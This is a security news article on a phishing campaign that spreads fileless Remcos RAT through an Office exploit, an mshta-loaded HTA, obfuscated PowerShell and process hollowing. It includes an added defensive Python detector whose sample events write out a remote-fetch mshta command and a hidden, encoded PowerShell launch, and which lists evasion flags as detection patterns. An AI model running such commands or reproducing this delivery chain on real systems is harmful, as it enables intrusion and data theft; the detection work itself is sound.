Cybersecurity researchers have uncovered a phishing campaign distributing a fileless version of Remcos RAT, a commercially sold remote access tool: the RAT runs entirely in memory rather than being written to disk. According to Fortinet FortiGuard Labs researcher Xiaopeng Zhang, Remcos RAT boasts "an extensive suite of features enabling purchasers to control target systems remotely." Cybercriminals have co-opted this tool to covertly extract sensitive data from victims' devices and execute commands on them remotely.
The Phishing Attack Strategy
The campaign starts with a phishing email masquerading as a purchase order, enticing recipients to open a seemingly innocuous Microsoft Excel attachment. Once opened, the document exploits a remote code execution vulnerability in Office (CVE-2017-0199, CVSS score: 7.8) that Microsoft patched in 2017; the attack therefore only succeeds on installations that have not received that fix. The exploit downloads a malicious HTML Application (HTA) file, "cookienetbookinetcahce.hta," from a remote server and launches it via mshta.exe, the Windows HTA host, which activates the malware.
Multi-Layered Obfuscation and Anti-Detection Techniques
The downloaded HTA file is wrapped in multiple layers of JavaScript, VBScript, and PowerShell using different encoding methods, so that static scanners see only the outer wrapper. The HTA downloads an executable payload, which in turn runs a heavily obfuscated PowerShell program equipped with numerous anti-analysis and anti-debugging techniques. These evasions complicate both automated detection and manual analysis, allowing the infection chain to proceed unnoticed.
The final stage uses process hollowing: the loader starts a legitimate process, replaces its in-memory image with Remcos, and resumes it, so the RAT runs under a benign-looking process name and its binary never touches disk, bypassing conventional file-based detection. Once deployed, Remcos RAT can collect a wide array of system information, remotely execute commands, terminate processes, edit the Windows Registry, capture audio and video from the camera and microphone, and even disable keyboard and mouse input.
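The delivery chain described above (Excel spawning mshta.exe with a remote URL, the HTA dropping an executable, and that executable launching obfuscated PowerShell) leaves a distinctive process tree even though the RAT itself is fileless. The following detection script is an added example, not Fortinet's code or part of the original report. It assumes Sysmon-style process-creation records (pid, ppid, image path, command line); the sample events, paths, PIDs and the 203.0.113.10 URL are constructed for illustration.

```python
"""Flag the Office -> mshta.exe -> dropper -> PowerShell chain in process-creation events."""
import re
from dataclasses import dataclass
from typing import Dict, List

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full image path, as logged by Sysmon Event ID 1
    cmdline: str


@dataclass
class Finding:
    severity: str
    pid: int
    reason: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def powershell_flags(cmdline: str) -> List[str]:
    """Return the loader-style switches present on a PowerShell command line."""
    toks = cmdline.lower().split()
    hits = []
    for i, t in enumerate(toks):
        if t in {"-e", "-ec", "-enc", "-encodedcommand"}:
            hits.append("encoded command")
        elif t in {"-nop", "-noprofile"}:
            hits.append("no profile")
        elif t in {"-w", "-windowstyle"} and i + 1 < len(toks) and toks[i + 1] == "hidden":
            hits.append("hidden window")
    return hits


def ancestors(pid: int, by_pid: Dict[int, ProcEvent], limit: int = 32) -> List[str]:
    """Image names of the parent, grandparent, ... of pid (cycle- and depth-guarded)."""
    chain, seen = [], set()
    e = by_pid.get(pid)
    while e is not None and e.ppid in by_pid and e.ppid not in seen and len(chain) < limit:
        seen.add(e.ppid)
        e = by_pid[e.ppid]
        chain.append(basename(e.image))
    return chain


def analyze(events: List[ProcEvent]) -> List[Finding]:
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name == "mshta.exe":
            if pname in OFFICE_APPS:
                findings.append(Finding("high", e.pid, f"{pname} spawned mshta.exe"))
            if URL_RE.search(e.cmdline):
                findings.append(Finding("high", e.pid, "mshta.exe given a remote URL"))
        elif pname == "mshta.exe":
            # An HTA that launches another binary is the dropper step of the chain.
            findings.append(Finding("medium", e.pid, f"mshta.exe spawned {name}"))
        if name in {"powershell.exe", "pwsh.exe"}:
            flags = powershell_flags(e.cmdline)
            if flags:
                chain = ancestors(e.pid, by_pid)
                tainted = any(a in OFFICE_APPS or a == "mshta.exe" for a in chain)
                reason = "powershell with " + ", ".join(flags)
                if tainted:
                    reason += " under Office/mshta ancestry"
                findings.append(Finding("high" if tainted else "medium", e.pid, reason))
    return findings


# Constructed sample telemetry: one infection chain plus one benign admin script.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"EXCEL.EXE" "C:\Users\alice\Downloads\Purchase_Order.xlsx"'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://203.0.113.10/cookienetbookinetcahce.hta"),
    ProcEvent(400, 300, r"C:\Users\alice\AppData\Roaming\dropper.exe", "dropper.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc QQBBAEEA"),
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid}: {f.reason}")
```

Process-creation telemetry catches the delivery chain but not the hollowing itself; spotting the final stage requires memory-level signals such as a resumed process whose mapped image no longer matches its on-disk file, which an EDR or a memory scanner supplies and this script deliberately does not attempt.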
Evolving Phishing Techniques
The rise of such phishing tactics highlights a persistent trend: threat actors continually adapt their delivery methods to get past existing defenses. Wallarm recently disclosed a similar campaign that abused DocuSign APIs to send fake invoices, borrowing the service's legitimacy to bypass conventional email security controls. Other campaigns have used ZIP file concatenation, appending one archive to another so that different ZIP parsers extract different contents, to deliver remote access trojans while evading detection.
Takeaway: Reinforced Vigilance and Enhanced Security
These findings are a reminder for organizations and individuals alike to keep basic controls in place: the initial foothold here depends on an Office flaw patched years ago, and each subsequent stage relies on built-in tools such as mshta.exe and PowerShell. Patching, restricting those utilities where they are not needed, and monitoring for Office applications spawning script hosts would interrupt this chain before the fileless payload ever loads. By combining familiar tools with layered delivery methods, cybercriminals continue to slip past file-based detection, underlining the need for sustained vigilance and behavior-based monitoring.